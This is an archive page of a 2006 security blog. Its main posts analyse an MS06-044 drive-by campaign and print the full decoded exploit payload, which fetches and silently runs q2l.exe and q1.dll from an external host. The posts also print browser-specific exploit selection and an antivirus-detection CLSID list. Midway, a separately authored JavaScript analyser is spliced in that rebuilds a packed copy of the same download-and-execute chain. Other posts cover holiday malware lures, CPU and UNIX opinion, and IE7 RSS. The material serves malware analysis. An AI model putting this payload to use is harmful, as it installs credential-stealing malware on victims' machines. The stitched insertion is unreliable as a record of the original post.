Computers

December 29, 2006

MS06-044 in the wild (Update)

Filed under: Uncategorized — Lindon @ 7:17 am

We have recorded a video showing the exploit in action.

First, the user visits a web page that uses the exploit to download two files, q1.dll and q2l.exe. Then, when q2l.exe is executed, it moves the DLL to another directory so that the files survive the cleanup of the temporary directory they were downloaded into.

This DLL is injected into Internet Explorer in order to carry out its work in the background. Among other things it dumps the proxy, e-mail and configuration settings and the cached passwords. We have attached a sample of the dumped file, in which the proxy authentication data can be seen. The malware also has FTP capabilities, which it uses to upload the dumped files to an external server.

Attachment: ms06044_dump.JPG (62374 bytes)

Thanks again to Ismael Briones.


View Video (format: avi)

December 28, 2006

All I want for Christmas…

Filed under: Uncategorized — Lindon @ 5:06 pm

Spain is different. We even have our April Fools' Day on December 28! Nonetheless, today's post is going to be serious. Really.

Christmas is here to stay, at least for a few more days. Santa Claus gives way to New Year's Eve and the Three Wise Men, and crimeware will not miss the opportunity to tamper with computers worldwide in order to steal as much money as possible.

Social engineering is usually a weapon of opportunity. Be it Valentine's Day, Christmas or the FIFA World Cup, there will always be cybercrooks who will take advantage of the season and use that theme in their messages. Here are a few examples:

  • Zafi.D raised an Orange Alert status in December 2004. The e-mail messages it sent were written in fifteen different languages, wishing unsuspecting users a Merry Christmas... But the gift it came with was nefarious.

  • The worm Atak (variants H, I and J) was also cheerful: "Mery Chrismas & Happy New Year! 2005 will be the beginning!". In fact, it was the beginning, but for crimeware and the like.

  • Mimail.N and Downloader.AC spoke of a great New Year offer from Paypal in order to entice users into running their malicious files.

  • Nabload.U and Banker.BSX. These Trojans teamed up during last year's Christmas season. How could their authors have found a better season to release a banking Trojan and its downloader?

So, with so many examples of Christmas-related malware, how is it that people still fall for such an easy trick? It would seem that we do not really learn from our own mistakes. As soon as we recover from the latest "outbreak", we are willing to open yet another PowerPoint presentation (you know, Christmas+Blessing-4.ppt) or executable file (namely, Christmas_Puzzle.exe).***

Let's be careful out there... And let’s not fall for so-easy-to-spot tricks.

***Of course, the Three Wise Men know who you are... And you will receive coal instead of gifts. Really.

December 27, 2006

MS06-044 in the wild

Filed under: Uncategorized — Lindon @ 4:32 pm

A few days ago a number of small e-commerce sites were compromised; more information can be found at [http://www.securityfocus.com/archive/75/455149]. Those sites were being used to distribute payloads for the Microsoft vulnerability MS06-044 [http://www.microsoft.com/technet/security/Bulletin/MS06-044.mspx].

We have been investigating the files on one of those servers and have found JavaScript code that selects the vulnerability to exploit according to the visitor's browser and platform, as can be seen below (note that the malware has an exploit for each combination except IE 5 on NT and Firefox versions other than 1.0.4 and 1.5.x):

    switch (system_id) {
    case "ie7":
    case "ie6_xp":
    case "ie6_unknown":
    case "ie6_xpsp2":
        exp_vml();
        break;
    case "ie6_xpsp1":
        exp_vml();
        break;
    case "ie6_xpsp0":
        exp_iscomponentinstalled();
        break;
    case "ie6_2k":
        exp_vml();
        break;
    case "ie5_2k":
        exp_ms06_044();
        break;
    case "ie5_nt":
        break;
    case "ff104":
        exp_ff104();
        break;
    case "ff150":
        exp_ff154();
        break;
    default:
        break;
    }

The code is also able to detect whether an antivirus product is installed. To do so, it attempts to instantiate ActiveX objects, by ProgID and by CLSID, that belong to the following AV products (the numbered comments are the malware author's own):

progs=['NAVCfgWizDll.NAVCfgWizMgr',            //  1 NAV
       'McGDMgr.DwnldGroupMgr'];               //  2 McAfee

cids=['48F45200-91E6-11CE-8A4F-0080C81A28D4',  //  3 trendmicro
      '091EB208-39DD-417D-A5DD-7E2C2D8FB9CB',  //  4 Windows Defender
      'D653647D-D607-4DF6-A5B8-48D2BA195F7B',  //  5 BitDefender Antivirus
      '9F97547E-4609-42C5-AE0C-81C61FFAEBC3',  //  6 AVG7 
      '65756541-C65C-11CD-0000-4B656E696100',  //  7 Panda Antivirus
      '1474F601-9B4B-4EB0-81FA-20F753C0E1A4',  //  8 F-Prot
      'D5507020-DB45-11d1-A5F0-00600872F78D',  //  9 Norman Virus Control
      'DD230880-495A-11D1-B064-008048EC2FC5',  // 10 Kaspersky
      'B089FE88-FB52-11D3-BDF1-0050DA34150D',  // 11 Nod32
      '472083B0-C522-11CF-8763-00608CC02F24',  // 12 Avast
      '45AC2688-0253-4ED8-97DE-B5370FA7D48A',  // 13 Antivir
      '8934FCEF-F5B8-468F-951F-78A921CD3920',  // 14 Ewido
      '1EB2409C-6E28-4066-9738-97A1B8F5639C',  // 15 ??
      'E7593602-124B-47C9-9F73-A69308EDC973',  // 16 Dr Web
      'B43CB0C0-84F2-11D6-A18E-00C0DF043BA4']; // 17 VBA32


Now we are going to analyze the MS06-044 payload:

The code is the same as the one published by HD Moore during the Month of Browser Bugs [http://browserfun.blogspot.com/2006/08/ms06-044-internet-explorer-5x.html]. It exploits a local-zone privilege escalation vulnerability in Internet Explorer 5 on Windows 2000.

The payload uses XMLHttpRequest (the object behind AJAX applications) to download two files in the background, q2l.exe and q1.dll, from http://***.cc/q/, and an ADODB.Stream object to write them into the Windows Temp directory, C:\DOCUME~1\ADMINI~1\CONFIG~1\Temp (the path is taken from the TEMP environment variable of the process).

Finally q2l.exe is launched through WScript.Shell with a hidden window (window style 0) and the following command line, in which each argument is quoted: "C:\DOCUME~1\ADMINI~1\CONFIG~1\Temp\q2l.exe" "C:\DOCUME~1\ADMINI~1\CONFIG~1\Temp\q1.dll" "C:\Program Files\Internet Explorer\iexplore.exe"


The payload is obfuscated with the JavaScript "unescape" function: the page carries the script as a percent-encoded string and decodes it at run time. This is the decoded payload:

<html><head></head><body>
<script language='javascript'>
// Fetch url with the XMLHTTP object and write the raw response body to
// disk through an ADODB.Stream (Type 1 = binary, SaveToFile mode 2 = overwrite).
function get_file(xml, o, url, file)
{
        xml.open("GET", url, false);
        xml.send(null);
        var dat = xml.responseBody;
        // xml.close();

        o.Type = 1;
        o.Mode = 3;
        o.Open();
        o.Write(dat);
        o.SaveToFile(file, 2);
        o.Close();
}

function go(server_addr)
{
        //alert("Started ok! server_addr=["+server_addr+"]");

        // These ActiveX objects are only creatable because the page runs in
        // the local zone, which is what MS06-044 grants.
        var s = new ActiveXObject("WScript.Shell");
        var o = new ActiveXObject("ADODB.Stream");
        var e = s.Environment("Process");

        var q1_url  = "http://"+server_addr+"/q/q1.dll";
        var q2l_url = "http://"+server_addr+"/q/q2l.exe";
        var xml = null;
        // Destination paths come from the process environment (TEMP, PROGRAMFILES).
        var q1 = e.Item("TEMP") + "\\q1.dll";
        var q2l = e.Item("TEMP") + "\\q2l.exe";
        var pf = e.Item("PROGRAMFILES");
        var dat;

        // Try the native object first, then the two MSXML ProgIDs.
        try { xml=new XMLHttpRequest(); }
        catch(e) {
                try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
                catch(e) {
                        xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
                }
        }

        if (!xml) {
                alert("Failed to create XMLHTTP object");
                return(0);
        }

        // Redundant first fetch of q1.dll; the result is never used.
        xml.open("GET", q1_url, false);
        xml.send(null);
        dat = xml.responseBody;

        get_file(xml, o, q1_url, q1);
        get_file(xml, o, q2l_url, q2l);
        // Run the dropper with the DLL and iexplore.exe as arguments; 0 = hidden window.
        var run_cmd = '"'+q2l+'" "'+q1+'" "'+pf+'\\Internet Explorer\\iexplore.exe"';
        // var run_cmd ='cmd.exe /c calc.exe';
        //alert('Executing the payload: ['+run_cmd+']');
        s.Run(run_cmd, 0);
}

go('***.cc');</script>
</body></html>
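The following is an added example and not code from the post or from the compromised sites: a small static analyser for pages of this kind. It peels the "unescape" packing layer by layer, the way an analyst would before reading the payload above, and then extracts the indicators worth recording: the ActiveX ProgIDs and CLSIDs the page probes (the AV fingerprinting list shown earlier), the .exe/.dll names, full URLs, and whether the XMLHTTP + ADODB.Stream + WScript.Shell download-and-execute chain is present. SAMPLE_PAGE is constructed here to mirror the post's payload and is packed with a helper that mimics escape(); "***.cc" is the post's own redaction, kept as-is. The ProgID regex is a heuristic of this example, not something taken from the malware.

```javascript
// Added example (not from the original post): decode unescape()-packed
// drive-by pages and extract indicators of compromise from the result.

// unescape() semantics: %uXXXX is one UTF-16 code unit, %XX one byte,
// anything else passes through unchanged.
function jsUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u, b) => String.fromCharCode(parseInt(u !== undefined ? u : b, 16)));
}

// Matches unescape("...") or unescape('...') with a literal string argument.
const UNESCAPE_CALL = /unescape\(\s*(["'])((?:(?!\1)[^\\]|\\.)*)\1\s*\)/;

// Replace each literal unescape() call with its decoded text until none is
// left, so nested layers (document.write -> eval -> ...) are all peeled.
function unpack(script, maxLayers = 8) {
  let cur = script, layers = 0;
  for (; layers < maxLayers; layers++) {
    const m = UNESCAPE_CALL.exec(cur);
    if (!m) break;
    cur = cur.slice(0, m.index) + jsUnescape(m[2]) + cur.slice(m.index + m[0].length);
  }
  return { text: cur, layers };
}

const uniq = a => [...new Set(a)];
const GUID = /\b[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\b/g;
// Heuristic (assumption of this example): a quoted "Vendor.Object" literal whose
// second part is capitalised is a ProgID; this keeps WScript.Shell and drops "q1.dll".
const PROGID = /["']([A-Za-z]\w*\.[A-Z][\w.]*)["']/g;

function extractIndicators(page) {
  const { text, layers } = unpack(page);
  return {
    layers,
    progids: uniq([...text.matchAll(PROGID)].map(m => m[1])),
    clsids: uniq((text.match(GUID) || []).map(g => g.toUpperCase())),
    urls: uniq(text.match(/https?:\/\/[^\s"'+)]+/g) || []),
    files: uniq(text.match(/\b[\w-]+\.(?:exe|dll)\b/gi) || []),
    // The chain seen in the post: fetch with XMLHTTP, write with ADODB.Stream,
    // launch with WScript.Shell.Run. All four pieces together is the signal.
    downloadAndExecute: /ADODB\.Stream/.test(text) && /\.SaveToFile\(/.test(text)
      && /WScript\.Shell/.test(text) && /\.Run\(/.test(text),
  };
}

// ---- constructed sample (not taken from the compromised sites) ----
// Packer used only to build the sample: percent-encodes every byte the way
// escape() does, so the page looks like the ones found in the wild.
function packForUnescape(s) {
  return Array.from(s, ch => {
    const c = ch.charCodeAt(0);
    if (/[A-Za-z0-9@*_+\-./]/.test(ch)) return ch;
    return c > 0xff ? '%u' + c.toString(16).toUpperCase().padStart(4, '0')
                    : '%' + c.toString(16).toUpperCase().padStart(2, '0');
  }).join('');
}

const INNER = [
  'var s = new ActiveXObject("WScript.Shell");',
  'var o = new ActiveXObject("ADODB.Stream");',
  'var e = s.Environment("Process");',
  'var q1 = e.Item("TEMP") + "\\\\q1.dll", q2l = e.Item("TEMP") + "\\\\q2l.exe";',
  'var base = "http://***.cc/q/";',
  'var xml = new ActiveXObject("Microsoft.XMLHTTP");',
  'xml.open("GET", base + "q1.dll", false); xml.send(null);',
  'o.Type = 1; o.Mode = 3; o.Open(); o.Write(xml.responseBody); o.SaveToFile(q1, 2); o.Close();',
  'var pf = e.Item("PROGRAMFILES");',
  's.Run(\'"\' + q2l + \'" "\' + q1 + \'" "\' + pf + \'\\\\Internet Explorer\\\\iexplore.exe"\', 0);',
].join('\n');

// Two packing layers: document.write(unescape(...)) wrapping eval(unescape(...)).
const LAYER1 = '<script>eval(unescape("' + packForUnescape(INNER) + '"));</script>';
const SAMPLE_PAGE = '<html><body><script>' +
  "var progs=['NAVCfgWizDll.NAVCfgWizMgr','McGDMgr.DwnldGroupMgr'];" +
  "var cids=['48F45200-91E6-11CE-8A4F-0080C81A28D4','DD230880-495A-11D1-B064-008048EC2FC5'];" +
  'document.write(unescape("' + packForUnescape(LAYER1) + '"));' +
  '</script></body></html>';

console.log(JSON.stringify(extractIndicators(SAMPLE_PAGE), null, 2));
```

Run it with node; the report lists two peeled layers, the five ProgIDs, the two CLSIDs, the q/ directory URL, the three file names and downloadAndExecute: true. Real pages add further tricks (string splitting, arithmetic on character codes, eval of concatenations) that a literal-argument matcher does not peel; for those, run the script in a sandboxed interpreter with unescape, eval and document.write hooked instead of extending the regexes.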

We would like to thank Ismael Briones for gathering all this information.

Ahead of the Curve: 2007: Something for everyone

Filed under: Uncategorized — Lindon @ 11:00 am

(InfoWorld) - Some Decembers, I look to the coming year and pray that I can earn my keep on the unpredictable visits from my muse that result in a departure from some of my more done-to-death subjects. It’s something of a relief to leave behind 2006, a year in which I spent loads of time yelling into the wind that Intel, despite its best work to date, is farther behind AMD than ever.

In 2007, let’s agree to focus on scalability. Let’s see what happens to power draw and performance when we turn off CPU cores, and black out entire sockets one by one on Intel and AMD multicore systems. Subtraction is revealing. Next year, let’s look at the tangible differences between robust multicore as IBM and AMD implement it, and approximated multicore as Intel does it.

Next year, let’s take a fresh look at long-forgotten PC UNIX, the simple beauty that, but for in-fighting and litigiousness, would have given us a slender, mature, inviolable operating system core. Open source development would have thrived with that foundation. Next year, let’s take a close and frank look at Apple’s OS X Leopard and its Darwin core, which Apple claims will be UNIX-certified on its release. Let’s watch what happens to System V UNIX, a criminally neglected property that belongs in the public’s hands and under responsible stewardship, which means having it taken from SCO.

Open source Java is a greater boon than anyone imagines, not only to open source but to commercial development as well. Freedom to optimize, extend (with deviation from the specification punished by torture) and, to my mind, just plain understand what should be the hottest dynamic language on the planet for both clients and servers will carry Java to new places. By the same token, 2007 will be many developers’ first encounter with Objective-C. I was put off by the Win32-like burdens it placed on developers; miscounted memory, file handles and such resources accounted for much of a Mac application’s debugging and QA effort. I’m hopeful that Objective-C, which, contrary to belief is not an Apple language but a native compiled language in the GNU compiler collection, will find favor on platforms other than the Mac. Its ready rapport with Java balances Java’s dynamic freedom with the speed of native code.

Last, let’s agree to keep little black books of emerging technologies we want to follow. Let’s remember that the greatest opportunities do not lie in the places where the crowds are forming, but in the quieter places no one thinks to look. There are hungry, impoverished, frightened and isolated people who are truly worthwhile investments, and their communities are genuine, ground-floor emerging markets. In these places, interest bearing micro-loans of a few hundred dollars breed sustainable businesses. Technology and connectivity will have an even greater impact with return that’s just as rapid.

Don’t be motivated by pity; it’s corrosive. Instead, close your eyes and know that genius and drive exist in the same proportion among the unfortunate as they do among the fortunate. One teenager blogging from a place the “civilized world” has forgotten can gain a following, get picked up by a magazine and change his life and the lives of all those around him. Create possibilities with an eye toward profiting from them; I forgive you. While we wait like new parents for altruistic motivation to care for others, we waste opportunities where investment serves the needy better than charity.

December 26, 2006

How to Subscribe to RSS with IE7

Filed under: tutorials RSS IE7 — Lindon @ 7:21 pm

Some of you are starting the migration to IE 7. Others are probably experiencing the browser with your new PC. Either way, one new feature you'll want to research is the ability to subscribe to web feeds or RSS. Microsoft has added some nice touches to their integrated feed reader including a common feed list. If you've never explored the world of syndicated content, now's the time. We have a quick tutorial showing how easy it is to subscribe to a feed.